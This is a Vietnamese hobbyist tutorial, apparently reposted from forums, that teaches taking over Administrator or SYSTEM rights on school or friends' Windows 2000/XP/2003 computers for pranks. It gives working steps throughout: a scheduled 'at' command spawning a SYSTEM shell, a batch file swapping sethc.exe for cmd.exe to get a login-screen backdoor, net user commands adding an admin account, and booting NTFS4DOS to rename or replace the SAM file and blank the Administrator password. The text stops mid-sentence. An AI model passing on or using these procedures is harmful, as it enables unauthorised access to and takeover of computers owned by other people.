Cướp quyền Admin trong vòng 1 phút với quyền User
Trò này chơi ở trường học hoặc đến nhà bạn đẻ quậy cũng rất vui..
VD: khi đang chỉ là guest hoặc user thuờng bạn sẽ biến thành admin system trong 1
phút và làm cái gì tuỳ thích..
- Huớng dẫn:
mở hộp RUN.. hoặc nhấn nut window + R
gõ: cmd nhấn enter để mở cửa sổ DOS đen xì
Sau đó gõ lệnh sau:
Code:
at TIME /interactive "cmd.exe"
(TIME là giờ tính theo hệ thống cộng thêm 1 phút , vd bạn máy bạn là 10:49 pm thì
time sẽ là 22:50 )
sau đó đợi một lúc nó sẽ hiện ra cửa sổ DOS khác .. đóng cái cũ lại
Sau đó nhấn nút
Ctr + Alt + Deleteđể hiện hộp hệ thống system,,
Chọn
Tab Processsau đó tìm file
explorer.exesau đó nhấn nut KILL để xoá explorer ra khỏi hệ thống ..
Lúc này hệ thơng sẽ tụ động swich user ngầm và tự động đăng nhập với quyền cao
nhất là Admin SYSTEM..
Hướng Dẫn Cướp Quyền Admin
Nếu bạn chịu khó tìm thì trên mạng có nhiều kinh nghiệm về chuyện này lắm! Mình
thì không cần vì lúc nào cũng nghiễm nhiên có quyền Admin rồi. Coi chừng bạn học
mấy chiêu này bị ông anh ...bụp đó nghe!
Đây là tài liệu mình sưu tầm trên mạng - chưa vọc nên bạn cứ thử nhé!
Cách 1:
Đầu tiên bạn vào Start/Run /gõ lệnh cmd /ok
Tại dấu nhắc Dos bạn đánh tiếp lệnh NET USER ----> Nó sẽ hiện ra tất cả các tài
khoản đã được tạo trên máy tính (trong đó có user của admin). tiếp theo bạn đánh
tiếp lệnh NET USER (user admin) sau đó bạn type pass mới vào đó là xong.
Chú ý :Cách này chỉ dùng đc. khi acc user của bạn đc. add trong group Admin và tên

tài khoản Admin ko có dấu cách
Mẹo:
Mình có 1 mẹo nhỏ này : Nếu bạn logon vào 1 máy tính cái winxp và đòi password
đơn giản thôi:
Hãy thử ấn Ctrl +Altr + Del 3 lần xem.
Khi đó 1 cửa sổ login mới sẽ xuất hiện, bạn điền vào name :"administrator",
ô password thì khỏi điền gì hết
Chú ý : Cách này dùng nếu tài khoản Administrator không đặt pass và máy local
Cách 2:
Hiện nay không có quá nhiều cách để phục hồi mật khẩu của tài khoản dministrator
trong Windows bị quên mất. Có thể kể đến là dùng công cụ hỗ trợ của đĩa Hiren Boot
để xóa trắng mật khẩu của tài khoản Administrator hay dùng các công cụ dò tìm mật
khẩu trên Net. Tuy vậy, không phải lúc nào chúng ta cũng có công cụ để dùng. Nếu
gặp những lúc như thế.... hãy lợi dụng lỗ hỏng của file sethc.exe trên Windows. Trên
Windows XP, nếu bạn nhấp phím Shift 5 lần, Windows sẽ gọi một chương trình nhỏ
có tên là StickyKey. Đây là chương trình hỗ trợ người khuyết tật khi sử dụng
Windows XP được đính kèm mặc đinh trong bộ tiện ích của Windows. Nếu bạn đăng
nhập bằng tài khoản có tên User1 và nhấp phím Shift 5 lần để gọi chương trình này,
Windows sẽ lấy quyền của User1 để gọi chương trình StickyKey. Nếu bạn không đăng
nhập vào bất kỳ một tài khoản nào mà gọi được StickyKey thì Widnows sẽ lấy quyên
của hệ thống (System) để chạy StickyKey.
Từ giả định trên, nếu bạn thay thế file thực thi của chương trình StickyKey
(sethc.exe) bằng chương trình Command Run (cmd.exe) và gọi nó bằng 5 lần phím
Shift mà không đăng nhập bằng tài khoản nào cả thì windows sẽ dùng quyền của Hệ
thống (system) gọi file cmd.exe thay vì file sethc.exe. Thế là có thể làm bất cứ
chuyện gì bằng tài khoản của cao nhất (quyền của Hệ thống) trên chương trình
Command Run.
Vì vậy:
Bước 1: Vào windows với tài khoản User bình thường và nhấn 5 lần phím Shift để gọi
thử chương trình StickyKey trên Windows và đóng nó lại (chỉ nhằm để xem thử).

Bước 2: Vào Start >> Run >> nhập vào Notepad và Enter để gọi chương trình
Notepad.exe. Copy đoạn mã sau, past vào notepad, Save lại với tên là Hackpass.bat
Code:
*********************
echo off
cls
cd %systemroot%/system32
rename sethc.exe sethc.exe.bk
copy cmd.exe sethc.exe /y
*********************
Sau đó nhấp kép chuột lên file Hackpass.bat để thực thi!
Đoạn mã này làm các nhiệm vụ sau:
1. Sao lưu lại file sethc.exe bằng cách đặt lại tên là sethc.exe.bk
2. Thay thế file sethc.exe bằng file cmd.exe
Đến đây, bạn nhấp phím Shift 5 lần, nếu chương trình Command Run được gọi thay
vì chương trình StickyKey thì bạn đã thành công!
Bước 3: Khởi động lại máy. Khi đến màn hình đăng nhập, bạn khoan hãy đăng nhập
mà nhấn phím Shift 5 lần...... Lúc này chương trình Command Run xuất hiện, bạn
nhập một trong những vào đoạn lệnh dưới đây
Xóa trắng password của Administrator:
Code:
net user Administrator
---- > nhấn phím Enter khi hoàn thành!
Thêm một tài khoản Admin với mật khẩu là 123
Code:
net user Admin 123 /add
---- > nhấn phím Enter khi hoàn thành!
Gán tài khoản Admin vào nhóm quản trị:
Code:
net localgroup Administrators Admin /add

---- > nhấn phím Enter khi hoàn thành!
Nếu bạn sử dụng đúng cấu trúc lệnh phía trên, bạn sẽ tạo được các tài khoản mới.
Tại đây, bạn có thể đăng nhập vào các tài khoản mới mà không cần khởi động lại
máy!
Cách 3: Đoạt quyền Adim trong Win 2000, 2003, XP
1. Cách đoạt quyền Admin trong Win2K :
- Trước hết bạn phải Download phần mềm NTFS4DOS về để tạo đĩa khởi động có thể
nhìn được ổ đĩa có phân vùng NTFS .
- Sau khi Download về bạn tiến hành cài đặt và tạo đĩa mềm khởi động ( Chú ý :
Trước khi tạo đĩa mềm khởi động có thể nhìn thấy phân vùng NTFS thì đĩa mềm của
bạn phải được Format và là đĩa Boot có thể boot được từ DOS từ trước thì mới có thể
dùng phần mềm NTFS4DOS để tạo đĩa mềm có thể nhìn được phân vùng NTFS từ
DOS ) . Thế là xong bước tạo đĩa mềm boot .
- Tiếp theo bạn đến cái máy mà bạn muốn đoạt quyền Admin và vào CMOS của nó
đặt First Boot là : Floppy Driver ( Nếu máy đó đặt password CMOS thì bạn có thể phá
Pass CMOS bằng các phần mềm khác , tui xin miễn hướng dẫn phần này ) .
- Sau khi khởi động và Boot bằng đĩa mềm sẽ hiện ra 3 phần cho bạn chọn , bạn
chọn cái đầu tiên là : NTFS4DOS . Sau đó bạn cứ để mặc cho nó chạy tiếp. Tiếp sau
đó nó sẽ hiện ra một dòng thông báo hỏi bạn có muốn sử dụng tiện ích NTFS4DOS
ko ? bạn đánh chữ yes và ấn Enter .
sau đó nó sẽ hiện ra dòng A:\> bạn chuyển sang ổ đĩa cứng là phân vùng chính cài
Win ( Ở đây tôi sẽ lấy ví dụ là ổ C
A:\> C:
C:\> cd WINNT\SYSTEM32\CONFIG ( dùng lệnh cd để chuyển đến thư mục
WINNT\SYSTEM32\CONFIG
Tiếp tục : Tại C:\>WINNT\SYSTEM32\CONFIG bạn đánh lệnh dir
C:\>WINNT\SYSTEM32\CONFIG\dir
Ta sẽ nhìn thấy file có tên là : SAM
Tiếp tục tại dấu nhắc lệnh : C:\>WINNT\SYSTEM32\CONFIG bạn đánh lệnh
C:\>WINNT\SYSTEM32\CONFIG\ren SAM DUNG

sau đó bạn đánh thử lại lệnh Dir để kiểm tra xem đã có file tên DUNG chưa ? Nếu có
rồi thì đẫ thành công .
Chú ý : Tốt nhất là trước khi đánh lệnh ren SAM DUNG để đổi tên file SAM bạn lên
backup nó trứơc :
C:\>WINNT\SYSTEM32\CONFIG\md Backup (Để tạo thư mục backup)
C:\>WINNT\SYSTEM32\CONFIG\copy SAM C:\>WINNT\SYSTEM32\CONFIG\BACKUP
( làm như vậy cho chắc ăn )
Sau đó bạn restart lại máy thế là OK , khi đăng nhập vào máy bạn chỉ cần gõ User là
: Administrator còn Password thì không cần đánh chỉ việc gõ Enter .
2. Cách đoạt quyền Admin trong WinXP :
- Cách làm thì tương tự như là ở trog Win2K , nhưng như các bạn đã biết nếu như
chúng ta cũng đổi tên file SAM như ở trong WIN2K thì chắc chắn là WinXP sẽ bị lỗi và
không thể nào vào được Win ( Sẽ bị Restart lại máy )
- Vậy thì làm cách nào có thể đoạt được quền Administrator bi giờ ? .
Có một cách và tui đã thử thành công , không biết các bạn đã đoán ra chưa nhỉ , nếu
ai biết rùi thì thui nhé , tui post cho những người chưa biết .
- Đầu tiên tui cũng chưa biết làm thế nào, nhưng về sau tui đã đánh liều và thử một
cách như sau :
+ Tui đến một máy cài WinXP khác , tui tạo Pass của user có tên là Administrator là
trắng (Nghĩa là không đặt password , password bỏ trắng) , tui khởi động lại máy ,
sau đó tui vào DOS và copy lại cái file SAM ở cái máy mà tui vừa tạo với pass của
User : Administrator (Đây là người có quyền quản trị cao nhất) là trắng vào thư mục
BACKUP trong đĩa mềm của tui.
+ Sau đó tui sang cái máy cài WinXP mà tui muốn cướp quyền Admin ( Với pass của
Administrator mà tui không biết )
+ và tui làm y như các bước như trên ( Chú ý : Trong WINXP thì không phải là thư
mục WINNT như trong Win2K mà nó là thư mục WINDOWS) :
Sau khi khởi động và Boot bằng đĩa mềm sẽ hiện ra 3 phần cho bạn chọn , bạn chọn
cái đầu tiên là : NTFS4DOS . Sau đó bạn cứ để mặc cho nó chạy tiếp. Tiếp sau đó nó
sẽ hiện ra một dòng thông báo hỏi bạn có muốn sử dụng tiện ích NTFS4DOS ko ?

bạn đánh chữ yes và ấn Enter .
sau đó nó sẽ hiện ra dòng A:\> bạn chuyển sang ổ đĩa cứng là phân vùng chính cài
Win ( Ở đây tôi sẽ lấy ví dụ là ổ C
A:\> C:
C:\> cd WINDOWS\SYSTEM32\CONFIG ( dùng lệnh cd để chuyển đến thư mục
WINDOWS\SYSTEM32\CONFIG
Tiếp tục : Tại C:\>WINDOWS\SYSTEM32\CONFIG bạn đánh lệnh dir
C:\>WINDOWS\SYSTEM32\CONFIG\dir
Ta sẽ nhìn thấy file có tên là : SAM
Tiếp tục tại dấu nhắc lệnh : C:\>WINDOWS\SYSTEM32\CONFIG bạn đánh lệnh
C:\>WINDOWS\SYSTEM32\CONFIG\ren SAM DUNG
sau đó bạn đánh thử lại lệnh Dir để kiểm tra xem đã có file tên DUNG chưa ? Nếu có
rồi thì đẫ thành công .
Chú ý : Tốt nhất là trước khi đánh lệnh ren SAM DUNG để đổi tên file SAM bạn lên
backup nó trứơc :
C:\>WINDOWS\SYSTEM32\CONFIG\md Backup (Để tạo thư mục backup)
C:\>WINDOWS\SYSTEM32\CONFIG\copy SAM
C:\>WINDOWS\SYSTEM32\CONFIG\BACKUP ( làm như vậy cho chắc ăn )
- Tiếp theo từ C:\>WINDOWS\SYSTEM32\CONFIG tui đánh lệnh
C:\>WINDOWS\SYSTEM32\CONFIG A: để chuyển sang ổ mềm A
- Tại ổ A ta đánh lệnh A:\>cd Backup để vào thư mục BACKUP ở trong ở A .
- Tại A:\>BACKUP> ta đánh lệnh dir để kiểm tra xem đã thấy file SAM ở trong đó
chưa A\BACKUP>dir
- Từ A\BACKUP\ ta đánh lệnh :
A\BACKUP\copy SAM C:\>WINDOWS\SYSTEM32\CONFIG (Chú ý : Trước khi đánh
lệnh trên thì bạn phải chắc chắn là file SAM ở trong thư mục
C:\>WINDOWS\SYSTEM32\CONFIG đã được đổi tên thành tên khác )
- Sau khi đánh lệnh trên xong nếu copy thành công bạn sẽ nhận được 1 thông báo là
: 1 file copy ... gì gì đó tui không nhớ lắm . Sau đó bạn khởi động lại máy và bỏ đĩa
mềm ra .

- Khi đăng nhập vào máy bạn gõ user là Administrator và password là trắng bạn cứ
việc gõ Enter thế là Okie giờ đây bạn đã là Người có quyền quản trị cao nhất.
3. Cách đoạt quyền Admin trong Win 2000 Server sử dụng Domain Controller :
Với thằng Win2kSrv DC này thì hơi rắc rối hơn một chút , vì máy sử dụng Win2kSrv
DC thì pass Admin sẽ không lưu trong file SAM nữa , vì file SAM chỉ áp dụng cho
Local mà thui . Trong Win2kSrv DC thì nếu như tui nhớ không nhầm thì nó nằm ở file
gì đó có đuôi là .DIT thì phải ( Nếu tui nhớ không nhầm đó nha)
Trước hết các bạn cũng làm các bước như trên :
Sau khi khởi động và Boot bằng đĩa mềm hoặc là đĩa CD sẽ hiện ra 3 phần cho bạn
chọn , bạn chọn cái đầu tiên là : NTFS4DOS . Sau đó bạn cứ để mặc cho nó chạy
tiếp. Tiếp sau đó nó sẽ hiện ra một dòng thông báo hỏi bạn có muốn sử dụng tiện ích
NTFS4DOS ko ? bạn đánh chữ yes và ấn Enter .
sau đó nó sẽ hiện ra dòng A:\> bạn chuyển sang ổ đĩa cứng là phân vùng chính cài
Win ( Ở đây tôi sẽ lấy ví dụ là ổ C
A:\> C:
C:\> cd WINNT\SYSTEM32\CONFIG ( dùng lệnh cd để chuyển đến thư mục
WINNT\SYSTEM32\CONFIG
Tiếp tục : Tại C:\>WINNT\SYSTEM32\CONFIG bạn đánh lệnh dir
C:\>WINNT\SYSTEM32\CONFIG\dir
Ta sẽ nhìn thấy file có tên là : SAM
Tiếp tục tại dấu nhắc lệnh : C:\>WINNT\SYSTEM32\CONFIG bạn đánh lệnh
C:\>WINNT\SYSTEM32\CONFIG\ren SAM DUNG
sau đó bạn đánh thử lại lệnh Dir để kiểm tra xem đã có file tên DUNG chưa ? Nếu có
rồi thì đẫ thành công .
Chú ý : Tốt nhất là trước khi đánh lệnh ren SAM DUNG để đổi tên file SAM bạn lên
backup nó trứơc :
C:\>WINNT\SYSTEM32\CONFIG\md Backup (Để tạo thư mục backup)
C:\>WINNT\SYSTEM32\CONFIG\copy SAM C:\>WINNT\SYSTEM32\CONFIG\BACKUP
( làm như vậy cho chắc ăn )
Sau đó bạn Restart lại máy , sau khi máy khởi động lại bạn ấn phím F8 liên tục để

vào chế đọ lựa chọn , sau khi ấn F8 sẽ có nhiều mục cho bạn lựa chọn , nhưng để
hack được bạn phải chọn vào chế độ
"Directory Service Recovery Mode . . ."
Sau đó bạn sẽ vào được trong chế độ Safemode và máy sẽ yêu cầu bạn ấn tổ hợp
phím CTRL-ALT-DEL và bạn đăng nhập vào máy với User là : Administrator và tất
nhiên là Password sẽ không có rùi . Nhưng bạn đừng tưởng vậy là xong vì bạn có đổi